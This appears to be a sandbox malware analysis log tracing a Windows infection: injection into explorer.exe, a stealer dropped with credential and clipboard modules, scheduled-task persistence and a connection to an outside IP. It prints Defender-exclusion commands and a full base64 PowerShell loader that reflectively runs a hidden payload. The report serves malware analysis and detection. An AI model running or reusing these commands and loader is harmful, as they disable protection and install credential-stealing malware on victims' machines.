Source: C:\Users\user\AppData\Roaming\gfiecjd Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102DCA8 LdrLoadDll, 14_2_000001FF7102DCA8
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059A4ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0059A4ED
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058FA0A LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0058FA0A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A027F mov eax, dword ptr fs:[00000030h] 8_3_032A027F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_00427277 mov eax, dword ptr fs:[00000030h] 23_3_00427277
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_00427277 mov eax, dword ptr fs:[00000030h] 23_2_00427277
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059DC12 mov eax, dword ptr fs:[00000030h] 24_2_0059DC12
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00599F9B mov eax, dword ptr fs:[00000030h] 24_2_00599F9B
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_0040170C HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,memcpy,HeapAlloc,memcpy,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy, 23_2_0040170C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 13_2_0000024AB87F1A90
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059A4ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0059A4ED
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058162A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0058162A
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00580C5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00580C5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: gfiecjd.21.dr
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.196.8.137 80
Source: Yara match File source: amsi32_5720.amsi.csv, type: OTHER
Source: Yara match File source: C:\Users\user\UndLdl.ps1, type: DROPPED
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00566990 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 24_2_00566990
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Thread created: C:\Windows\explorer.exe EIP: 1121950
Source: C:\Users\user\AppData\Roaming\gfiecjd Thread created: unknown EIP: 11E1950
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded Q1|
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded Q1|
Source: C:\Windows\explorer.exe Memory written: PID: 5084 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 2300 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 748 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 5380 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 7044 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 6756 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3172 base: 9079C0 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3660 base: 7FF6747E2D10 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3688 base: 9079C0 value: 90
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9079C0
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwy
MjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')) | out-file -filepath 'c:\users\user\undldl.ps1' -encoding utf8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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')) | out-file -filepath 'c:\users\user\undldl.ps1' -encoding utf8"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00581816 cpuid 24_2_00581816
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\clip64.dll VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFF83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 13_3_00007DF488BFF83C
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058065A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 24_2_0058065A
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00566080 DeleteObject,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 24_2_00566080
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A5DE7 _free,_free,_free,GetTimeZoneInformation,_free, 24_2_005A5DE7
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: dialer.exe, 00000008.00000002.2179356766.0000000003394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 31.0.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.F557.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.F557.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2762475426.0000000000561000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2780370976.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2747569546.000000000B660000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2750807460.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
